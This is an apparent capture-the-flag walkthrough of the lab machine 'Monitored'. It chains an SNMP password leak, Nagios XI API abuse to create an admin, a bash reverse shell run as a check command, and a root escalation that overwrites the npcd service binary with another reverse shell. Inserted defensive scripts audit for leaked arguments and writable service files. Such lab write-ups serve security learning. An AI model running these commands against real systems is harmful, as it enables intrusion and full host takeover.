Monitored

My note about Monitored machine

Enumeration :

Host is up (0.28s latency).
Not shown: 977 open|filtered udp ports (no-response)
Bug in snmp-win32-software: no string output.
PORT      STATE  SERVICE        VERSION
20/udp    closed ftp-data
123/udp   open   ntp            NTP v4 (unsynchronized)
| ntp-info: 
|_  
161/udp   open   snmp           SNMPv1 server; net-snmp SNMPv3 server (public)
| snmp-sysdescr: Linux monitored 5.10.0-27-amd64 #1 SMP Debian 5.10.205-2 (2023-12-31) x86_64
|_  System uptime: 2h39m49.63s (958963 timeticks)
| snmp-processes: 
|   1: 
|   2: 
|   3: 
|   4: 
|   5: 
|   6: 
|   8: 
|   9: 
|   10: 
|   11: 
|   12: 
|   13: 
|   15: 
|   16: 
|   17: 
|   18: 
|   20: 
|   23: 
|   24: 
|   25: 
|   26: 
|   27: 
|   28: 
|   29: 
|   30: 
|   31: 
|   50: 
|   51: 
|   52: 
|   53: 
|   54: 
|   55: 
|   56: 
|   57: 
|_  58: 
| snmp-interfaces: 
|   lo
|     IP address: 127.0.0.1  Netmask: 255.0.0.0
|     Type: softwareLoopback  Speed: 10 Mbps
|     Traffic stats: 1.85 Mb sent, 1.85 Mb received
|   VMware VMXNET3 Ethernet Controller
|     IP address: 10.10.11.248  Netmask: 255.255.254.0
|     MAC address: 00:50:56:b9:1a:fa (VMware)
|     Type: ethernetCsmacd  Speed: 4 Gbps
|_    Traffic stats: 135.05 Mb sent, 66.12 Mb received
| snmp-netstat: 
|   TCP  0.0.0.0:22           0.0.0.0:0
|   TCP  0.0.0.0:389          0.0.0.0:0
|   TCP  10.10.11.248:44534   10.10.14.62:1337
|   TCP  10.10.11.248:50556   10.10.14.62:1337
|   TCP  127.0.0.1:25         0.0.0.0:0
|   TCP  127.0.0.1:3306       0.0.0.0:0
|   TCP  127.0.0.1:5432       0.0.0.0:0
|   TCP  127.0.0.1:7878       0.0.0.0:0
|   TCP  127.0.0.1:59654      127.0.1.1:80
|   TCP  127.0.0.1:59658      127.0.1.1:80
|   UDP  0.0.0.0:68           *:*
|   UDP  0.0.0.0:123          *:*
|   UDP  0.0.0.0:161          *:*
|   UDP  0.0.0.0:162          *:*
|   UDP  10.10.11.248:123     *:*
|_  UDP  127.0.0.1:123        *:*
| snmp-info: 
|   enterprise: net-snmp
|   engineIDFormat: unknown
|   engineIDData: 6f3fa7421af94c6500000000
|   snmpEngineBoots: 35
|_  snmpEngineTime: 2h39m49s
162/udp   open   snmp           net-snmp; net-snmp SNMPv3 server
| snmp-info: 
|   enterprise: net-snmp
|   engineIDFormat: unknown
|   engineIDData: 5a44ab2146ff4c6500000000
|   snmpEngineBoots: 26
|_  snmpEngineTime: 2h58m12s
1040/udp  closed netarx
1090/udp  closed ff-fms
3659/udp  closed apple-sasl
4672/udp  closed rfa
5632/udp  closed pcanywherestat
17726/udp closed unknown
17762/udp closed unknown
19075/udp closed unknown
20872/udp closed unknown
21524/udp closed unknown
23980/udp closed unknown
31189/udp closed unknown
42431/udp closed unknown
47624/udp closed directplaysrvr
49157/udp closed unknown
49181/udp closed unknown
57410/udp closed unknown
57843/udp closed unknown
60381/udp closed unknown
Service Info: Host: monitored

Host script results:
|_clock-skew: 6s

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 5236.49 seconds

Note that the SNMP port is open.

Resource related : https://book.hacktricks.xyz/network-services-pentesting/pentesting-snmp

Output from snmpwalk:

STRING: "-c sleep 30; sudo -u svc /bin/bash -c /opt/scripts/check_host.sh svc XjH7VCehowpR1xZB "
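The snmpwalk line above shows why SNMP process enumeration matters: hrSWRunParameters exposes full command lines, including a password passed as an argument to check_host.sh. As an added defender-side check (not part of the original notes), this script parses snmpwalk-style output, here a constructed sample with a placeholder password, and flags arguments that look like credentials.

```python
import math
import re
import shlex

# Constructed sample in the style of `snmpwalk -v2c -c public <host> hrSWRunParameters`.
# The password value is a made-up placeholder, not the one from the machine.
SAMPLE_WALK = """\
HOST-RESOURCES-MIB::hrSWRunParameters.1 = STRING: "splash"
HOST-RESOURCES-MIB::hrSWRunParameters.612 = STRING: "-c sleep 30; sudo -u svc /bin/bash -c /opt/scripts/check_host.sh svc Fq8ExampleSecret2Z"
HOST-RESOURCES-MIB::hrSWRunParameters.700 = STRING: "-p 5432 -D /var/lib/postgresql/13/main"
HOST-RESOURCES-MIB::hrSWRunParameters.801 = STRING: "--password=S3cretValue99 --user=backup"
"""

LINE_RE = re.compile(r'hrSWRunParameters\.(\d+) = STRING: "(.*)"$')
# Option names that conventionally carry a credential, with or without "=value".
SECRET_FLAG_RE = re.compile(r'^-{1,2}(pass(word)?|pw|token|secret|apikey)(=|$)', re.I)

def shannon_entropy(s: str) -> float:
    """Bits per character; random-looking tokens score well above 3."""
    return -sum(s.count(c) / len(s) * math.log2(s.count(c) / len(s)) for c in set(s))

def looks_like_secret(tok: str) -> bool:
    """Long, mixed-case alphanumeric with digits and high entropy: a password, not a path or option."""
    return (len(tok) >= 12 and tok.isalnum() and any(c.isdigit() for c in tok)
            and tok != tok.lower() and tok != tok.upper() and shannon_entropy(tok) >= 3.0)

def redact(tok: str) -> str:
    return tok[:2] + "***"

def find_leaked_args(walk_text: str) -> list:
    """Return (pid, reason, redacted_value) for each argument that looks like a credential."""
    findings = []
    for line in walk_text.splitlines():
        m = LINE_RE.search(line)
        if not m:
            continue
        pid, args = int(m.group(1)), m.group(2)
        try:
            toks = shlex.split(args)
        except ValueError:          # unbalanced quotes in an odd argv: fall back to whitespace split
            toks = args.split()
        i = 0
        while i < len(toks):
            tok = toks[i]
            if SECRET_FLAG_RE.match(tok):
                value = tok.split("=", 1)[1] if "=" in tok else (toks[i + 1] if i + 1 < len(toks) else "")
                findings.append((pid, "credential flag", redact(value)))
                i += 1 if "=" in tok else 2
                continue
            if looks_like_secret(tok):
                findings.append((pid, "high-entropy argument", redact(tok)))
            i += 1
    return findings

if __name__ == "__main__":
    for pid, reason, value in find_leaked_args(SAMPLE_WALK):
        print(f"pid {pid}: {reason}: {value}")
```

On the host side, the fix is to restrict the public community to a view that excludes the HOST-RESOURCES process tables and to stop passing credentials on command lines (an environment variable or a root-readable file works instead).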

Add nagios.monitored.htb to the hosts file and navigate to https://nagios.monitored.htb (port 80 is open).

Found a login page:

Username: svc
Password: XjH7VCehowpR1xZB
Tested the login on this page, but it failed.

But login works on https://nagios.monitored.htb/nagios instead.

Nothing useful there.

Testing and scanning:

Get an auth token (the api directory was found by scanning):

curl -s -XPOST -k -L 'https://nagios.monitored.htb/nagiosxi/api/v1/authenticate?pretty=1' -d 'username=svc&password=XjH7VCehowpR1xZB&valid_min=5' | tee /dev/tty | grep -o '"auth_token": "[^"]*' | grep -o '[^"]*$'

Get the session cookie (replace the token with the auth_token returned by the previous command):

curl -s -k -c - "https://nagios.monitored.htb/nagiosxi/login.php?token=$Auth_Token_get_from_previous_command" | tee /dev/tty | grep "HttpOnly_nagios.monitored.htb" | awk '{print $NF}'

Related CVE research: https://vuldb.com/?id.239985

  • sqlmap dumps the user table:

Use the api_key to create our own admin account to log in:

curl -s -XPOST "http://nagios.monitored.htb/nagiosxi/api/v1/system/user?apikey=$API_KEY&pretty=1" -d "username=admin&password=admin&name=admin&email=admin@mail.com&auth_level=admin"

And log in with that account at the login page:

Move to RCE:

Add a new command:

Click Add New and set the command to the reverse shell bash -c 'bash -i >& /dev/tcp/10.10.x.x/4444 0>&1', give it a name that is easy to find later, and Apply Configuration.

Monitoring > Hosts > localhost

Choose the command with the name set in the previous step:

Run the check command to execute it.

Set up a netcat listener and get the user shell:

Upgrade the shell: export TERM=xterm

  • Getting root:

Check sudo -l:

  • Exploit manage_services.sh (we can stop the npcd service):

sudo /usr/local/nagiosxi/scripts/manage_services.sh stop npcd

Then edit the file at /usr/local/nagios/bin/npcd:

Add #!/bin/bash and 'bash -i >& /dev/tcp/ip/port 0>&1'

Then set up another netcat listener and start the npcd service -> root shell
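The root step works because a service that root restarts through the sudo-allowed manage_services.sh lives in a file the nagios user can edit. As an added hardening check (not part of the original notes), this script audits a service's binary directory for files or directories that a user other than the trusted owner could modify; demo() builds a constructed layout in a temp directory instead of touching /usr/local/nagios/bin.

```python
import os
import stat
import tempfile
from pathlib import Path

def audit_service_dir(root: str, trusted_uid: int = 0) -> list:
    """Return sorted (relative_path, reason) for anything under root that a user other
    than trusted_uid could modify: wrong owner, or group/world write bit on a file or dir."""
    findings = []
    top = Path(root)
    for path in [top, *top.rglob("*")]:      # include root: a writable dir allows file replacement
        st = path.lstat()                    # lstat: judge a symlink by its own bits, not the target
        rel = str(path.relative_to(root))
        if st.st_uid != trusted_uid:
            findings.append((rel, f"owned by uid {st.st_uid}, not {trusted_uid}"))
        if stat.S_ISLNK(st.st_mode):
            continue                         # mode bits on symlinks are meaningless on Linux
        if st.st_mode & (stat.S_IWGRP | stat.S_IWOTH):
            findings.append((rel, "group/world writable"))
    return sorted(findings)

def demo() -> list:
    # Constructed layout mimicking /usr/local/nagios/bin: a 0755 daemon next to a 0775 one.
    # trusted_uid is our own uid so the demo runs unprivileged; on a real host use 0 (root).
    root = tempfile.mkdtemp(prefix="nagios-bin-audit-")
    for name, mode in (("nagios", 0o755), ("npcd", 0o775)):
        p = Path(root, name)
        p.write_text("#!/bin/sh\nexit 0\n")
        p.chmod(mode)
    return audit_service_dir(root, trusted_uid=os.getuid())

if __name__ == "__main__":
    for rel, reason in demo():
        print(f"{rel}: {reason}")
```

Run it against the real directory as audit_service_dir("/usr/local/nagios/bin") to list anything a non-root account could rewrite before root starts it.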
